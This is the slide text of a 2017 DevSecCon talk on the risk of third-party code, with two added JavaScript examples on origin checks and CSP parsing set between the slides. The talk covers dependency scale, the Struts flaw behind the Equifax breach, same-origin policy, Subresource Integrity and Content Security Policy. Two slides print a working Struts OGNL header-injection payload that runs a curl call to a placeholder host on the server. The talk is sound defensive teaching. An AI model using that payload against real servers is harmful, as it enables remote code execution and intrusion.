
DevSecCon London 2017: Their-problems-are-your-problems-devseccon by Tim Kadlec


  1. Join the conversation #DevSecCon BY TIM KADLEC @TKADLEC Their Problems Are Your Problems
  2. THEIR PROBLEMS ARE YOUR PROBLEMS Tim Kadlec | @tkadlec
  3. HELL IS OTHER PEOPLE’S CODE
  4. CODE
  6. CONTEXT
  7. OPINIONS
  8. ASSUMPTIONS
  9. WEB IS POWERED BY OTHER PEOPLE’S CODE
  10. 9 MILLION Different Users
  11. 28% More artifacts indexed in past year
  12. 23,411,471 Packages downloaded per month
  13. HUGE BOOST FOR PRODUCTIVITY
  14. 1,000 DEPENDENCIES
  15. 1,000 DEPENDENCIES ~5 CONTRIBUTORS
  16. 1,000 DEPENDENCIES ~5 CONTRIBUTORS 5,000 DEVELOPERS
  17. 5,000 DEVELOPERS
  18. OFFLOAD THE WORK But not the RISK
  19. OFFLOAD THE WORK But not the RESPONSIBILITY
  20. http://bit.ly/struts-vuln
  21. http://bit.ly/snyk-struts
  22. curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
  25. public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { ... if (content_type != null && content_type.contains("multipart/form-data")) { ... request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); } return request; }
  28. String errorMessage = buildErrorMessage(e, new Object[] {e.getPermittedSize(), e.getActualSize()});
  29. curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
  30. MARCH 6: FIXED VERSION RELEASED. MARCH 7: EXPLOIT SCRIPTS APPEAR. MAY 13-JULY 30: EQUIFAX BREACH. SEPTEMBER 7: BREACH ANNOUNCED
  31. [Chart: OPEN-SOURCE LIBRARY VULNS BY YEAR, 2007 to 2017]
  32. “The human error was that the individual who’s responsible for communicating in the organization to apply the patch, did not.”
  33. EVERYONE’S RESPONSIBILITY
  34. LAYERS OF DEFENSE
  35. 77% USE A VULNERABLE JS LIBRARY
  36. http://bit.ly/lh-audit
  37. http://bit.ly/sonarwhal
  38. ~35% Third-Party Resources (2013)
  43. 2013 to 2017: ~53% Third-Party Resources
  44. 77-99% Third-Party Resources on 38% of sites
  45. SAME-ORIGIN POLICY
  46. ORIGIN: SCHEME + HOSTNAME + PORT
  47. http://foo.com/index.html
  48. http://foo.com/index.html: scheme = http://
  49. http://foo.com/index.html: scheme = http://, host = foo.com
  50. http://foo.com/index.html: scheme = http://, host = foo.com, port = implied, 80
  51. http://foo.com/index.html vs. http://foo.com/about.html, https://foo.com/index.html, http://a.foo.com/about.html, http://foo.com:80/about.html
  53. http://foo.com/index.html vs. http://foo.com/about.html, https://foo.com/index.html, http://a.foo.com/about.html, http://foo.com:81/about.html
  57. --disable-web-security
  58. about:blank javascript:
  59. var xhr = new XMLHttpRequest(); xhr.open('GET', "https://www.devseccon.com/"); xhr.send();
  60. <script src="..."></script> <img src="..." /> <link href="..." />
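The origin comparison from slides 46 to 56, worked through in code. This is an added example and not part of the talk's slides: it derives an origin as scheme + hostname + effective port (default ports implied, exactly the point slide 50 makes), then runs the five URLs the slides compare against http://foo.com/index.html and reports which component differs. The page and candidate URLs are the slide's values; the function names are mine.

```javascript
// Added example (not from the slides): same-origin policy comparison.
// An origin is the tuple (scheme, host, port). Path, query and fragment
// never take part in the check, which is why index.html and about.html agree.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// Effective port: the URL parser drops an explicit default port (":80" on
// http), so an empty port means "use the scheme's default".
function effectivePort(u) {
  return u.port || DEFAULT_PORTS[u.protocol] || '';
}

// Canonical origin string used for the comparison.
function originOf(urlString) {
  const u = new URL(urlString);
  return `${u.protocol}//${u.hostname}:${effectivePort(u)}`;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Name the components that differ; handy when a fetch is blocked and the
// console only says "cross-origin".
function originDiff(a, b) {
  const ua = new URL(a), ub = new URL(b);
  const reasons = [];
  if (ua.protocol !== ub.protocol) reasons.push('scheme');
  if (ua.hostname !== ub.hostname) reasons.push('host');
  if (effectivePort(ua) !== effectivePort(ub)) reasons.push('port');
  return reasons;
}

// The table from slides 51 to 56.
const PAGE = 'http://foo.com/index.html';
const CANDIDATES = [
  'http://foo.com/about.html',    // same origin: only the path differs
  'https://foo.com/index.html',   // cross origin: scheme (and implied port)
  'http://a.foo.com/about.html',  // cross origin: host
  'http://foo.com:80/about.html', // same origin: 80 is http's implied port
  'http://foo.com:81/about.html', // cross origin: port
];

function compareAll(page = PAGE, candidates = CANDIDATES) {
  return candidates.map((url) => ({
    url,
    sameOrigin: sameOrigin(page, url),
    differs: originDiff(page, url),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of compareAll()) {
    const why = r.differs.length ? `  (differs in ${r.differs.join(', ')})` : '';
    console.log(`${r.sameOrigin ? 'SAME ' : 'CROSS'} ${r.url}${why}`);
  }
}
```

Run it with `node` to print the slide's table with the reason for each cross-origin verdict. Note that https vs http reports both scheme and port, because changing the scheme also changes the implied default port.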
  61. SUBRESOURCE INTEGRITY
  62. <script src="https://foo.com/framework.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"></script>
  64. CONTENT SECURITY POLICY (CSP)
  65. SAME-ORIGIN POLICY?
  66. WHITELIST
  67. Content-Security-Policy: policy;
  68. Content-Security-Policy: resource-directive source-list;
  69. Content-Security-Policy: script-src 'self' https://apis.google.com;
  70. base-uri child-src connect-src font-src form-action frame-ancestors img-src media-src object-src plugin-types report-uri style-src script-src upgrade-insecure-requests
  71. Content-Security-Policy: default-src 'self';
  72. none self unsafe-inline unsafe-eval
  73. Content-Security-Policy: default-src 'self'; script-src 'nonce-2726c7f26c'
  74. <script nonce="2726c7f26c"> alert(123); </script>
  75. Content-Security-Policy: script-src 'sha256-cLuU6nVzrYJlo7rUa6PFrPQrEUpOHllb5ic='
  76. Content-Security-Policy-Report-Only:
  77. CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
  78. Content-Security-Policy-Report-Only: default-src https:; form-action https:; report-uri https://myreport.com;
  79. Content-Security-Policy: default-src https:; form-action https:; report-uri https://myreport.com;
  80. CONTENT-SECURITY-POLICY: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com
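The directive / source-list grammar of slides 67 to 80, made concrete. This is an added example, not material from the talk: it parses a CSP header into a directive map and answers "does this directive allow this URL?" for the GitHub policy quoted on slides 77 and 80, including default-src fallback and the directives that never fall back. The page origin https://github.com/ is an assumption, the function names are mine, and the matcher is deliberately simplified against the browser algorithm: it handles 'none', 'self', scheme sources (https:, data:), and host sources with optional scheme, leading wildcard and port, while ignoring paths in host sources. The same parser applies to a Content-Security-Policy-Report-Only header, which shares the syntax and only changes enforcement into reporting.

```javascript
// Added example (not from the slides): parse a CSP header and evaluate a URL
// against a directive. Simplified matcher; see the lead-in for what is covered.

// Policy quoted on slides 77 and 80 (split across lines for readability).
const GITHUB_CSP =
  "default-src 'none'; base-uri 'self'; block-all-mixed-content; " +
  'child-src render.githubusercontent.com; ' +
  "connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com; " +
  'font-src assets-cdn.github.com; ' +
  "form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; " +
  "img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com; " +
  "media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; " +
  "script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com";
const PAGE_URL = 'https://github.com/'; // assumed protected page

// Directives that never fall back to default-src when absent.
const NO_FALLBACK = new Set(['base-uri', 'form-action', 'frame-ancestors', 'report-uri',
  'plugin-types', 'sandbox', 'block-all-mixed-content', 'upgrade-insecure-requests']);
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// "directive src src; directive ..." -> Map(directive -> [sources])
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Does one source expression permit this URL?
function sourceMatches(src, url, pageUrl) {
  const s = src.replace(/^'|'$/g, ''); // keyword sources are quoted in the header
  const u = new URL(url), p = new URL(pageUrl);
  if (s === 'none' || s.startsWith('unsafe-')) return false;
  if (s === 'self') return u.origin === p.origin;
  if (s.startsWith('nonce-') || /^sha(256|384|512)-/.test(s)) return false; // apply to inline code, not URLs
  if (/^[a-z][a-z0-9+.-]*:$/i.test(s)) return u.protocol === s.toLowerCase(); // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?/i.exec(s);   // host-source
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme) {
    if (u.protocol !== `${scheme.toLowerCase()}:`) return false;
  } else if (u.protocol !== p.protocol && !(p.protocol === 'http:' && u.protocol === 'https:')) {
    return false; // schemeless host source: page's scheme, or an upgrade from http to https
  }
  const h = host.toLowerCase();
  if (h === '*') { /* any host */ }
  else if (h.startsWith('*.')) { if (!u.hostname.endsWith(h.slice(1))) return false; }
  else if (u.hostname !== h) return false;
  if (port && port !== '*' && (u.port || DEFAULT_PORTS[u.protocol] || '') !== port) return false;
  return true;
}

// Which directive governs this request once fallback is applied? null = unrestricted.
function governingDirective(policy, directive) {
  if (policy.has(directive)) return directive;
  if (!NO_FALLBACK.has(directive) && policy.has('default-src')) return 'default-src';
  return null;
}

function allows(policy, directive, url, pageUrl = PAGE_URL) {
  const via = governingDirective(policy, directive);
  if (via === null) return { allowed: true, via };
  return { allowed: policy.get(via).some((s) => sourceMatches(s, url, pageUrl)), via };
}

if (typeof require !== 'undefined' && require.main === module) {
  const policy = parseCsp(GITHUB_CSP);
  const checks = [
    ['script-src', 'https://assets-cdn.github.com/app.js'],
    ['script-src', 'https://github.com/inline.js'],
    ['img-src', 'https://secure.gravatar.com/avatar.png'],
    ['connect-src', 'ws://live.github.com/'],
    ['manifest-src', 'https://github.com/manifest.json'],
  ];
  for (const [directive, url] of checks) {
    const r = allows(policy, directive, url);
    console.log(`${r.allowed ? 'ALLOW' : 'BLOCK'} ${directive} ${url} (via ${r.via})`);
  }
}
```

Two things the output makes visible that the header alone hides: a directive missing from a policy with no default-src is unrestricted, and frame-ancestors and form-action stay unrestricted even when default-src is set, which is why the GitHub policy lists them explicitly.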
  81. SERVERLESS & PAAS
  82. UNPATCHED SERVERS
  83. COMPROMISED SERVERS
  84. WHAT’S THE PATH OF LEAST RESISTANCE?
  85. http://bit.ly/bucket-finder
  86. SECURE BY DEFAULT
  87. OFFLOAD THE WORK But not the RESPONSIBILITY
  88. REAL PEOPLE PAYING THE PRICE
  89. http://bit.ly/owasp-cloud
  90. SYSTEM CONFIGURATION, NETWORK LAYER, FRONT-END CODE, BACK-END COMPONENTS, THIRD-PARTY SERVICES
  91. LAYERS OF DEFENSE
  92. EVERYONE’S RESPONSIBILITY
  93. BRING SECURITY TO THE TEAM
  94. WEB IS POWERED BY OTHER PEOPLE’S CODE
  95. WEB’S SAFETY & STABILITY IS UP TO US
  96. Join the conversation #DevSecCon Thank you! Tim Kadlec | @tkadlec
